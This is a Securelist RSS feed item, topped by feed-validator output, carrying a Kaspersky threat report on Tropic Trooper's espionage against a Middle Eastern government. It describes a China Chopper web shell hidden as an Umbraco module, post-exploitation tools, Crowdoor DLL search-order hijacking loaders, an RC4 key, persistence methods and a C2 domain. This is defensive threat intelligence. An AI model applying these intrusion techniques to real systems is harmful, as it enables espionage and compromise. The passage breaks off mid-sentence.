![[Valid RSS]](images/valid-rss-rogers.png "Valid RSS")
This is a valid RSS feed.
This feed is valid, but interoperability with the widest range of feed readers could be improved by implementing the following recommendations.
line 54, column 0: (85 occurrences) [help]
<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
line 54, column 0: (82 occurrences) [help]
<content:encoded><![CDATA[<p><img width="990" height="400" src="ht ...
<div id="attachment_113748" style="width: 377px" class="wp-caption aligncent ...
line 142, column 0: (62 occurrences) [help]
<div id="attachment_113748" style="width: 377px" class="wp-caption aligncent ...
line 142, column 0: (75 occurrences) [help]
<div id="attachment_113748" style="width: 377px" class="wp-caption aligncent ...
line 587, column 0: (29 occurrences) [help]
<div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="i ...
line 587, column 0: (29 occurrences) [help]
<div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="i ...
line 587, column 0: (29 occurrences) [help]
<div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="i ...
line 587, column 0: (55 occurrences) [help]
<div class="js-infogram-embed" data-id="_/Mcgn3YdviQBqE4NwvWaD" data-type="i ...
line 3366, column 3: (2 occurrences) [help]
]]></content:encoded>
^
<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" > <channel> <title>Securelist</title> <atom:link href="https://securelist.com/feed/" rel="self" type="application/rss+xml" /> <link>https://securelist.com</link> <description></description> <lastBuildDate>Thu, 05 Sep 2024 08:02:16 +0000</lastBuildDate> <language>en-US</language> <sy:updatePeriod> hourly </sy:updatePeriod> <sy:updateFrequency> 1 </sy:updateFrequency> <generator>https://wordpress.org/?v=6.5.5</generator> <image> <url>https://securelist.com/wp-content/themes/securelist2020/assets/images/content/site-icon.png</url> <title>Securelist</title> <link>https://securelist.com</link> <width>32</width> <height>32</height></image> <item> <title>Tropic Trooper spies on government entities in the Middle East</title> <link>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/</link> <comments>https://securelist.com/new-tropic-trooper-web-shell-infection/113737/#respond</comments> <dc:creator><![CDATA[Sherif Magdy]]></dc:creator> <pubDate>Thu, 05 Sep 2024 08:00:12 +0000</pubDate> <category><![CDATA[Malware descriptions]]></category> <category><![CDATA[APT]]></category> <category><![CDATA[Backdoor]]></category> <category><![CDATA[Chinese-speaking cybercrime]]></category> <category><![CDATA[DLL]]></category> <category><![CDATA[DLL hijacking]]></category> <category><![CDATA[Malware]]></category> <category><![CDATA[Malware Descriptions]]></category> <category><![CDATA[Malware Technologies]]></category> <category><![CDATA[Open source]]></category> <category><![CDATA[Pentest]]></category> <category><![CDATA[web shell]]></category><category><![CDATA[APT (Targeted attacks)]]></category> <category><![CDATA[Web threats]]></category> <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=113737</guid> <description><![CDATA[Kaspersky experts found a new variant of the China Chopper web shell from the Tropic Trooper group that imitates an Umbraco CMS module and targets a government entity in the Middle East.]]></description> <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/05071424/tropic-trooper-featured-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><h2 id="executive-summary">Executive summary</h2><p>Tropic Trooper (also known as KeyBoy and Pirate Panda) is <a href="https://documents.trendmicro.com/assets/wp/wp-operation-tropic-trooper.pdf" target="_blank" rel="noopener">an APT group</a> active since 2011. This group has traditionally targeted sectors such as government, healthcare, transportation and high-tech industries in Taiwan, the Philippines and Hong Kong. Our recent investigation has revealed that in 2024 they conducted persistent campaigns targeting a government entity in the Middle East, starting in June 2023.</p><p>Sighting this group’s TTPs in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them. This can help the threat intelligence community better understand the motives of this threat actor.</p><p>The infection came to our attention in June 2024, when our telemetry gave recurring alerts for a new China Chopper web shell variant (used by many Chinese-speaking actors), which was found on a public web server. The server was hosting an open-source content management system (CMS) called Umbraco, written in C#. The observed web shell component was compiled as a .NET module of Umbraco CMS.</p><p>In our subsequent investigation, we looked for more suspicious detections on this public server and identified multiple malware sets. These include post-exploitation tools, which, we assess with medium confidence, are related to and leveraged in this intrusion.</p><p>Furthermore, we identified new DLL search-order hijacking implants that are loaded from a legitimate vulnerable executable as it lacks the full path specification to the DLL it needs. This attack chain was attempting to load <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">the Crowdoor loader</a>, which is half-named after the SparrowDoor backdoor, <a href="https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/" target="_blank" rel="noopener">detailed by ESET</a>. During the attack, the security agent blocked the first Crowdoor loader, prompting the attackers to switch to a new, previously unreported variant, with almost the same impact.</p><p>We attribute this activity to the Chinese-speaking threat actor known as Tropic Trooper with high confidence. Our findings reveal an overlap in the techniques reported in <a href="https://www.virusbulletin.com/conference/vb2023/abstracts/unveiling-activities-tropic-trooper-2023-deep-analysis-xiangoop-loader-and-entryshell-payload" target="_blank" rel="noopener">recent Tropic Trooper campaigns</a>. The samples we found also show a high overlap with samples previously attributed to Tropic Trooper.</p><h2 id="background">Background</h2><p>In June 2024, we detected a new version of the well-known China Chopper web shell. Further investigation followed as it represents a module within Umbraco CMS, receiving commands via the Umbraco controller.</p><p>On the same public server hosting Umbraco, we found other suspicious implants and malware clusters, which appeared to be part of the same attack. The installed security agent kept detecting these malware implants, and the attackers tried to drop additional post-exploitation tools to achieve their main objectives: in this intrusion we assess with high confidence that the motive is cyber espionage.</p><p>The table below shows the discovered malware families related to this intrusion. The subsequent sections of this report provide a technical analysis of these malware clusters.</p><table width="100%"><tbody><tr><td width="20%"><strong>Malware Set</strong></td><td width="40%"><strong>Description</strong></td><td width="15%"><strong>Oldest Variant</strong></td><td width="15%"><strong>Earliest Variant</strong></td><td width="10%"><strong>Sample Count</strong></td></tr><tr><td>1 – Web shells</td><td>.NET Web shells found dropped into path<br /><pre class="crayon-plain-tag">c:\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root</pre>with filename similar to this pattern<br /><pre class="crayon-plain-tag">App_Web_{8}[a-z0-9].dll</pre></td><td>2023.08.25</td><td>2024.04.18</td><td>37</td></tr><tr><td>2 – Post-exploitation tools</td><td>Multiple post-exploitation tools dropped<br />into path<br /><pre class="crayon-plain-tag">c:\sql\tools\attunitycdcoracle\x64\1033</pre>Main usage: network scanning, lateral<br />movement, defense evasion<br />Main tools: Fscan, Swor and batch scripts</td><td>2024.05.07</td><td>2024.05.08</td><td>5</td></tr><tr><td>3 – DLL search-order hijacking implants – Crowdoor loaders</td><td>Multiple malicious DLLs, side-loaded into<br />other legitimate executables, dropped into<br />paths <pre class="crayon-plain-tag">c:\Windows\branding\data</pre> and<br /><pre class="crayon-plain-tag">c:\Users\Public\Music\data</pre>The malicious samples are called Crowdoor,<br />which, when run, drop CobaltStrike and<br />maintain persistence.</td><td>2024.04.18</td><td>2024.05.15</td><td>5</td></tr></tbody></table><h2 id="technical-details">Technical details</h2><h3 id="webshells-umbraco-modules">Webshells — Umbraco modules</h3><table width="100%"><tbody><tr><td width="20%">MD5</td><td width="80%"><a href="https://opentip.kaspersky.com/3F15C4431AD4573344AD56E8384EBD62/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______795309577e185eac&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">3f15c4431ad4573344ad56e8384ebd62</a></td></tr><tr><td>Sha-1</td><td>311d1d50673fbfc40b84d94239cd4fa784269465</td></tr><tr><td>Sha256</td><td>8df9fa495892fc3d183917162746ef8fd9e438ff0d639264236db553b09629dc</td></tr><tr><td>Link-Time</td><td>2024-05-06 10:19:28</td></tr><tr><td>File Type</td><td>dynamic-link-library, 32-bit, console / Microsoft Visual C# / Basic .NET | Microsoft.NET</td></tr><tr><td>File Name</td><td>App_Web_dentsd54.dll</td></tr></tbody></table><p>The module exhibits characteristics commonly associated with malicious activity, including obfuscation and dynamic execution of commands. The commands are received and dispatched by the <pre class="crayon-plain-tag">umbraco_bind_aspx</pre> module, as can be seen below.</p><div id="attachment_113748" style="width: 377px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png" class="magnificImage"><img fetchpriority="high" decoding="async" aria-describedby="caption-attachment-113748" class="size-full wp-image-113748" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png" alt="Malicious module found inside Umbraco CMS on the compromised server" width="367" height="461" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01.png 367w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-239x300.png 239w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-279x350.png 279w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164304/new_tropic_trooper_web_shell_infection_01-223x280.png 223w" sizes="(max-width: 367px) 100vw, 367px" /></a><p id="caption-attachment-113748" class="wp-caption-text">Malicious module found inside Umbraco CMS on the compromised server</p></div><p>The <pre class="crayon-plain-tag">umbraco_bind_aspx</pre> is a class generated by the ASP.NET framework for an ASPX page within Umbraco CMS. The framework automatically calls the <pre class="crayon-plain-tag">__BuildControlTree()</pre> function. This function, implemented by the attackers, is responsible for calling malicious code as the argument to the <pre class="crayon-plain-tag">RenderMethod()</pre> function. Also, event validation, which is a security feature in ASP.NET that prevents unauthorized events from being logged on the server, is disabled by setting <pre class="crayon-plain-tag">EnableEventValidation</pre> to <pre class="crayon-plain-tag">false</pre> as can be seen in the screenshot below.</p><div id="attachment_113749" style="width: 646px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-113749" class="size-full wp-image-113749" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png" alt="Malicious function implementing China Chopper registered as a callback function" width="636" height="176" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02.png 636w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164358/new_tropic_trooper_web_shell_infection_02-300x83.png 300w" sizes="(max-width: 636px) 100vw, 636px" /></a><p id="caption-attachment-113749" class="wp-caption-text">Malicious function implementing China Chopper registered as a callback function</p></div><pre class="crayon-plain-tag">__Render__control1()</pre> is the main malicious function. As can be seen in the screenshot below, a Base64 string is decoded and then executed via dynamic evaluation using JavaScript.</p><div id="attachment_113750" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03.png" class="magnificImage"><img decoding="async" aria-describedby="caption-attachment-113750" class="size-large wp-image-113750" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-1024x974.png" alt="Obfuscated dynamic JS code execution" width="1024" height="974" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-1024x974.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-300x285.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-768x731.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-368x350.png 368w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-740x704.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-294x280.png 294w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03-800x761.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164441/new_tropic_trooper_web_shell_infection_03.png 1447w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-113750" class="wp-caption-text">Obfuscated dynamic JS code execution</p></div><p>The script employs multiple Base64 decodings before the final JavaScript payload is generated and executed. The resulting code resembles the known functionality associated with the China Chopper web shell, a popular web shell used by attackers for remote access and control over compromised web servers.</p><div id="attachment_113752" style="width: 562px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113752" class="size-full wp-image-113752" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png" alt="China Chopper web shell functionality" width="552" height="166" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1.png 552w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04164641/new_tropic_trooper_web_shell_infection_04-1-300x90.png 300w" sizes="(max-width: 552px) 100vw, 552px" /></a><p id="caption-attachment-113752" class="wp-caption-text">China Chopper web shell functionality</p></div><p>The attackers then started dropping various samples on this server, notably a dropper that was pushing more compiled variants carrying the same functionality, but using different module names. These module names all match the pattern <pre class="crayon-plain-tag">App_Web_{8}[a-z0-9].dll</pre>. In our telemetry, we noticed exploitation attempts of several CVEs (CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 in Microsoft Exchange, CVE-2023-26360 in Adobe ColdFusion). Therefore, we believe with moderate confidence that these web shells were dropped by exploiting an existing unpatched vulnerability.</p><p>According to the timeline of the detection logs, the attackers were able to leverage some of these web shells to execute commands on the affected server and drop more post-exploitation tools utilized for lateral movement. The majority of observed software are open-source tools maintained by Chinese-speaking developers. These implants are dropped into the Umbraco CMS root directory.</p><p>We found the following tools:</p><ul><li><a href="https://github.com/shadow1ng/fscan/" target="_blank" rel="noopener"><strong>Fscan</strong></a>: A tool for vulnerability scanning including host status detection, port scanning, service enumeration, exploitation, etc. The tool documentation is in simplified Chinese and maintained by Chinese-speaking accounts. The attackers created a script, named <pre class="crayon-plain-tag">i.bat</pre>, to identify available machines on the network using simple ICMP ping requests. The output is directed to a text file, which is used later for lateral movement.</li><li><strong>Swor: </strong>A simple penetration testing tool whose author tried to make it immune to removal by security solutions. Based on its documentation, it can deploy mimikatz, FRP and ElevationStation. The tool is open-source and maintained by Chinese-speaking developers. This tool was previously sighted being leveraged in attacks on government entities in Malaysia, which is a similar industry vertical to the Middle East intrusion victimology. We found the same compiled sample in the wild at <pre class="crayon-plain-tag">[domain]/wampthemes/simple/123/In-Swor-v2/1.exe</pre>.</li><li><a href="https://github.com/L-codes/Neo-reGeorg/tree/master" target="_blank" rel="noopener"><strong>Neo-reGeorg</strong></a>: An open-source SOCKS5 proxy, the attackers used it to pivot to other machines and evade network-level security controls. Some detections suggest that this tool may be used to proxy traffic, but we have not been able to verify the actual purpose of proxying traffic through this server.</li><li><strong>ByPassGodzilla: </strong>A Chinese web shell encryptor used to obfuscate other deployed web shells to bypass detections. We were able to source different implementations of encrypted web shells in .NET and ASPX scripts from the same server. According to our telemetry, the newly discovered web shell was also associated with a campaign leveraging CVE-2023-26360 early this year targeting vulnerable servers in the Middle East.</li></ul><h3 id="backdoor-implants-using-dll-search-order-hijacking">Backdoor implants using DLL search-order hijacking</h3><p>The attackers tried to load a malicious DLL, <pre class="crayon-plain-tag">datast.dll</pre>, from <pre class="crayon-plain-tag">c:\Users\Public\Music\data</pre> three times. After these attempts failed, the attackers relied on another malicious loader, <pre class="crayon-plain-tag">VERSION.dll</pre>, which was dropped into <pre class="crayon-plain-tag">C:\Windows\branding\data</pre>. We discuss this below in the “New samples” section. We believe, based on our telemetry, that the Umbraco web shells were used to drop these files on the infected server.</p><p>Since the timeframe for loading the two malicious DLLs, <pre class="crayon-plain-tag">VERSION.dll</pre> and <pre class="crayon-plain-tag">datast.dll</pre>, were very close, it allowed us to link the two files. Additionally, the same approach was used for both: leveraging a legitimate executable file vulnerable to DLL search-order hijacking, which would load a malicious DLL dropped into the same path as the legitimate executable.</p><h4 id="the-datast-dll-library">The datast.dll library</h4><table width="100%"><tbody><tr><td width="20%">MD5</td><td width="80%"><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">a213873eb55dc092ddf3adbeb242bd44</a></td></tr><tr><td>Sha-1</td><td>3650899c669986e5f4363fdbd6cf5b78a6fcd484</td></tr><tr><td>Sha256</td><td>23dea3a74e3ff6a367754d02466db4c86ffda47efe09529d3aad52b0d5694b30</td></tr><tr><td>Link-Time</td><td>Thu Jul 27 16:21:38 2023 (UTC)</td></tr><tr><td>File Type</td><td>dynamic-link-library | 32-bit</td></tr><tr><td>File Name</td><td>datast.dll</td></tr></tbody></table><p>In this incident, our telemetry points to the malware export being called using the rundll32 command from the <pre class="crayon-plain-tag">a.bat</pre> file (MD5: fca94b8b718357143c53620c6b360470), which we were unable to obtain. A second assumption is that it was loaded through a legitimate executable using DLL search-order hijacking, as <pre class="crayon-plain-tag">datast.dll</pre> has been observed before, associated with Tropic Trooper and loaded by the same method. We believe with low to medium confidence that the batch script was merely used for testing purposes as the whole malware-loading chain was designed to be loaded from a legitimate executable.</p><p>Once loaded, <pre class="crayon-plain-tag">datast.dll</pre> exports a single function named <pre class="crayon-plain-tag">InitCore</pre>. This function usually gets imported by another DLL called <pre class="crayon-plain-tag">datastate.dll</pre>. The function implements the main functionality for this loader, decrypting the shellcode for the next stage from a memory buffer inside the <pre class="crayon-plain-tag">datastate.dll</pre> file using a variant of the RC4 stream cipher. The first code block is the Key Scheduling Algorithm (KSA), while the second block (the “for” loop in the image below) is the core of the KSA, where it scrambles the initial permutation using the hardcoded RC4 key <pre class="crayon-plain-tag">fYTUdr643$3u</pre>.</p><div id="attachment_113753" style="width: 496px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-113753" class="size-full wp-image-113753" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png" alt="Code stub responsible for decrypting the next stage" width="486" height="398" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05.png 486w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-300x246.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-427x350.png 427w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/09/04165422/new_tropic_trooper_web_shell_infection_05-342x280.png 342w" sizes="(max-width: 486px) 100vw, 486px" /></a><p id="caption-attachment-113753" class="wp-caption-text">Code stub responsible for decrypting the next stage</p></div><p><strong>Code stub responsible for decrypting the next stage</strong></p><p>After decryption, the shellcode is executed, then the next stage is loaded into the address space of the process that loaded <pre class="crayon-plain-tag">datast.dll</pre>.</p><h2 id="hunting-for-new-loaders">Hunting for new loaders</h2><p>As mentioned, the infection chain was not fully executed, forcing the attackers to shift to new undetected variants. By pivoting on the hardcoded RC4 key, we found a new set of files sharing similar code, which turned out to be new updated variants of this family with minor differences in functionality. Below is the chronological view of the evolution of this specific loader as observed from our telemetry and scanning third-party malware repositories.</p><table width="100%"><tbody><tr><td width="40%"><strong>MD5 hashes</strong></td><td width="15%"><strong>File name</strong></td><td width="15%"><strong>Exported functions</strong></td><td width="15%"><strong>File creation date</strong></td><td width="15%"><strong>Size</strong></td></tr><tr><td><a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">fd8382efb0a16225896d584da56c182c</a></td><td>datastate.dll</td><td>Clear – Server</td><td>2024-02-23</td><td>81KB</td></tr><tr><td><a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1dd03936baf0fe95b7e5b54a9dd4a577</a></td><td>datast.dll</td><td>Ldf/rcd</td><td>2024-02-23</td><td>80KB</td></tr><tr><td><a href="https://opentip.kaspersky.com/8A900F742D0E3CD3898F37DBC3D6E054/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______82e090652b08f023&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">8a900f742d0e3cd3898f37dbc3d6e054</a></td><td>NA</td><td>Clear – Server</td><td>2023-10-30</td><td>80kB</td></tr><tr><td><a href="https://opentip.kaspersky.com/A213873EB55DC092DDF3ADBEB242BD44/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______24243399edf45b8a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">a213873eb55dc092ddf3adbeb242bd44</a></td><td>datast.dll</td><td>InitCore</td><td>2023-07-21</td><td>178KB</td></tr><tr><td><a href="https://opentip.kaspersky.com/DD7593E9BA80502505C958B9BBBF2838/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______4ef4987adedc8b9c&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">dd7593e9ba80502505c958b9bbbf2838</a></td><td>datastate.dll</td><td>Clear – Server</td><td>2023-03-22</td><td>178KB</td></tr><tr><td><a href="https://opentip.kaspersky.com/2C7EBD103514018BAD223F25026D4DB3/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______10ebee13da5572e5&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">2c7ebd103514018bad223f25026d4db3</a></td><td>datastate.dll</td><td>Clear – Server</td><td>2023-03-10</td><td>81KB</td></tr></tbody></table><h2 id="recent-variants">Recent variants</h2><h3 id="updated-loader-variant-in-february-2024">Updated loader variant in February 2024</h3><p>In February 2024, a user uploaded three Crowdoor-related files to a multiscanner platform:</p><table width="100%"><tbody><tr><td width="25%"><strong>File name</strong></td><td width="40%"><strong>MD5 hash</strong></td><td width="35%"><strong>Description</strong></td></tr><tr><td>datastate.dll</td><td><a href="https://opentip.kaspersky.com/FD8382EFB0A16225896D584DA56C182C/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______1466f636dc038ceb&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">fd8382efb0a16225896d584da56c182c</a></td><td>Malicious loader DLL</td></tr><tr><td>datast.dll</td><td><a href="https://opentip.kaspersky.com/1DD03936BAF0FE95B7E5B54A9DD4A577/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______8a465f2128983aef&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">1dd03936baf0fe95b7e5b54a9dd4a577</a></td><td>Utility DLL used by datastate.dll</td></tr><tr><td>WinStore</td><td>c10643b3fb304972c650e593b69faaa1</td><td>Encrypted shellcode payload file</td></tr></tbody></table><p>These files are also involved in a DLL search-order hijacking sequence:</p><ol><li>A legitimate executable loads a vulnerable DLL (<pre class="crayon-plain-tag">datastate.dll</pre>);</li><li>This DLL then loads a malicious Crowdoor DLL (<pre class="crayon-plain-tag">datast.dll</pre>);</li><li>The loader DLL uses this malicious DLL to decrypt and load the Crowdoor payload.</li></ol><p>This method is hard to detect since the malicious functions are split across two DLLs, which mostly perform seemingly benign tasks, such as reading files or decrypting RC4 data. Both DLLs have build timestamps future-dating them to 26 May 2027.</p><p>The <pre class="crayon-plain-tag">datastate.dll</pre> loader imports two functions from <pre class="crayon-plain-tag">datast.dll</pre> — one called <pre class="crayon-plain-tag">rcd</pre> (likely “run code”) to execute the shellcode and another called <pre class="crayon-plain-tag">ldf</pre> (likely “load file”) to read content from a file that is named after a legitimate executable but without the file extension. In this case, the payload file uploaded is named WinStore, meaning the legitimate executable is <pre class="crayon-plain-tag">WinStore.exe</pre>. The loader uses the RC4 key <pre class="crayon-plain-tag">fYTUdr643$3u</pre>, the same key as found in the initial sample discussed in the previous section, to decrypt the payload file containing the same Crowdoor shellcode.</p><p>The Crowdoor payload from this chain stays active by creating a Windows service named WinStore, which is used as the service name, display name and description. If creation of the service fails, the payload uses the registry auto-start extensibility point (ASEP) at <pre class="crayon-plain-tag">HKCU\Software\Microsoft\Windows\CurrentVersion\Run</pre> with the value <pre class="crayon-plain-tag">WinStore</pre> to persist.</p><p>When executed, it injects itself into the <pre class="crayon-plain-tag">colorcpl.exe</pre> process with the command-line argument “2” and tries to contact a C2 server that is hardcoded in the payload using its configuration (blog.techmersion[.]com on port 443).</p><p>We compared the collected samples with the reference sample (MD5: a213873eb55dc092ddf3adbeb242bd44) and revealed a degree of code similarity in them. For example, the core functions responsible for loading the next stage are almost identical. Based on this, we believe with medium confidence that the newly found samples are related to Tropic Trooper, the same actor behind the Middle East intrusion.</p><p>The actor has likely been using this search-order hijacking technique since at least June 2022, which marks the first known instance of a malicious DLL being loaded through a vulnerable executable using this method, according to our telemetry. Tropic Trooper employs this technique to split the malicious code across several stages. In the first stage, only the extraction of the next stage, which was encrypted with the same RC4 key, occurs. Subsequently, the actual loader for the final implant is deployed.</p><h3 id="new-samples">New samples</h3><p>We investigated the second attempt made by the threat actor after failing to load the previously covered loader. The actor uploaded new samples detailed in the table below:</p><table width="100%"><tbody><tr><td width="30%"><strong>MD5 Hash</strong></td><td width="15%"><strong>File name </strong></td><td width="25%"><strong>File path</strong></td><td width="15%"><strong>File creation date</strong></td><td width="15%"><strong>Compilation timestamps</strong></td></tr><tr><td><a href="https://opentip.kaspersky.com/E845563BA35E8D227152165B0C3E769F/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______3b8215c376fe077a&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">e845563ba35e8d227152165b0c3e769f</a> (variant 1)</td><td>VERSION.dll</td><td>c:\Windows\branding\data</td><td>2024.04.28</td><td>Tue Jun 10 10:39:52 2025 (UTC)</td></tr><tr><td><a href="https://opentip.kaspersky.com/0B9AE998423A207F021F8E61B93BC849/results?icid=gl_securelist_acq_ona_smm__onl_b2b_securelist_lnk_sm-team_______a12f2aae6d6a38bc&utm_source=SL&utm_medium=SL&utm_campaign=SL" target="_blank" rel="noopener">0b9ae998423a207f021f8e61b93bc849</a> (variant 2)</td><td>VERSION.dll</td><td>c:\Windows\branding\data</td><td>2024.05.15</td><td>Thu Oct 24 10:23:24 2024 (UTC)</td></tr><tr><td>475aa86ae60c640eec4fdea93b5ed04d (legitimate executable)</td><td>inst.exe</td><td>c:\Windows\branding\data</td><td>2024.04.28</td><td>NA</td></tr></tbody></table><p>As usual, the same DLL search-order hijacking was used. Note that <pre class="crayon-plain-tag">inst.exe</pre>, which is a legitimate executable, imports three functions from <pre class="crayon-plain-tag">VERSION.dll</pre>:</p><ul><li>VerQueryValueW;</li><li>GetFileVersionInfoW;</li><li>GetFileVersionInfoSizeW.</li></ul><p>Each variant of the dropped <pre class="crayon-plain-tag">VERSION.dll</pre> implements the three exported functions, with minimal differences between both samples. Upon analyzing the three malicious exports from the samples, it is very likely that the attackers built them incrementally. The first sample (MD5: e845563ba35e8d227152165b0c3e769f) was dropped on April 28, immediately after the failed attempt to execute the old loader. This variant had fewer capabilities than the one dropped on May 15, which had a complete implementation for all the malicious capabilities needed to load the same shellcode that would load Crowdoor into memory.</p><p>Both variants have compilation timestamps set in the future. Looking at the <pre class="crayon-plain-tag">GetFileVersionInfoSizeW</pre> implementation between the two samples, we see that the most recently dropped sample has the full implementation, while the earlier sample has an empty implementation, implying gradual testing and development of this loader.</p><p>The main loading functionality was designed to execute a legitimate <pre class="crayon-plain-tag">msiexec.exe</pre> process, then inject the next stage by writing into its remote address space and creating a remote thread to execute it.</p><h2 id="the-victim">The victim</h2><p>We sighted this targeted intrusion in a government entity in the Middle East. At the same time, we saw a subset of these samples being used to target a government entity in Malaysia. This matches the type of targets and their location as described in recent Tropic Trooper reports.</p><h2 id="attribution">Attribution</h2><p>Based on the samples found, we are reassessing the relationship between Tropic Trooper and the FamousSparrow group, <a 